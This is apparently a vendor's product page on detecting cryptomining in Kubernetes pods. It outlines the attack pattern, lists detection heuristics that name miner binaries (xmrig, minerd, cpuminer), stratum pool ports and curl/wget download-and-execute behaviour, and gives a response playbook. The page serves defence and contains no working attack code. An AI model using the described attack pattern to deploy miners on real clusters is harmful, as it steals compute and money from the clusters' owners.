Platform IntegrationsChangelogPricingBlog
Deploy in your cluster
High Severity

Cryptomining Detection

A compromised deployment becomes a mining rig within minutes. Cryptomining attacks account for a large share of cloud security incidents — and image scanning won't catch a miner that's deployed post-launch.

Cryptomining detection in Kubernetes pods concept illustration

How cryptomining attacks work in Kubernetes

Attackers typically gain initial access via a misconfigured deployment, exposed API server, or vulnerable application. Once inside a pod, they download a mining binary (commonly xmrig or similar) and execute it. The attack often persists for days or weeks before discovery via a cloud billing spike.

  • Executes via post-deploy download — image scans clean, binary downloaded after container starts
  • Establishes outbound connection to mining pool — typically stratum protocol, port 3333/4444/14444
  • Sustains near-100% CPU on affected pods — visible in cloud billing but often attributed to application load
  • Spreads to co-located pods — attackers with cluster access deploy mining DaemonSets across all nodes

How Kubesentry detects cryptomining

  • Process name heuristics — flags known mining process names and argument patterns (xmrig, minerd, cpuminer) at exec() time
  • CPU anomaly baseline — detects workloads consuming 90%+ CPU sustained for >30s when baseline shows typical 10-30%
  • Outbound connection analysis — monitors connect() syscalls for connections to known mining pool IP ranges and stratum protocol ports
  • Curl/wget exec detection — alerts on shell executions that download and immediately execute binaries — a common miner installation pattern
  • K8s Audit log correlation — cross-references with API server events to identify if attacker also deployed additional pods

Response playbook

  1. Confirm the detection. Review process name, parent PID, and CPU metrics in the Kubesentry alert. Check if mining binary matches known hashes.
  2. Assess blast radius. Check if other pods in the same namespace or node are exhibiting similar patterns. Review K8s audit logs for unauthorized deployments.
  3. Terminate mining processes. Delete affected pods. If the mining binary was deployed as a DaemonSet, delete the DaemonSet first to prevent respawn.
  4. Revoke compromised credentials. Rotate service account tokens associated with the compromised namespace. Review RBAC bindings for excessive permissions.
  5. Identify the initial access vector. Trace the attack chain from the exec() event backward to the entry point — HTTP exploit, exposed endpoint, or compromised CI/CD credential.
  6. File cloud provider security report. Most providers (AWS, GCP, Azure) have channels for reporting compromised-account mining to recover costs. Document the timeline.

Related detections

Container Escape

Miners sometimes attempt escape to access host-level compute resources for higher throughput.

Lateral Movement

Sophisticated attackers spread mining across multiple nodes post-initial-access.

Privilege Escalation

Escalation to host may follow mining deployment for persistence and wider resource access.

Catch miners in seconds, not in your cloud bill.

eBPF-based detection, 30-second P99 alert latency.

Deploy in your cluster Read technical deep dive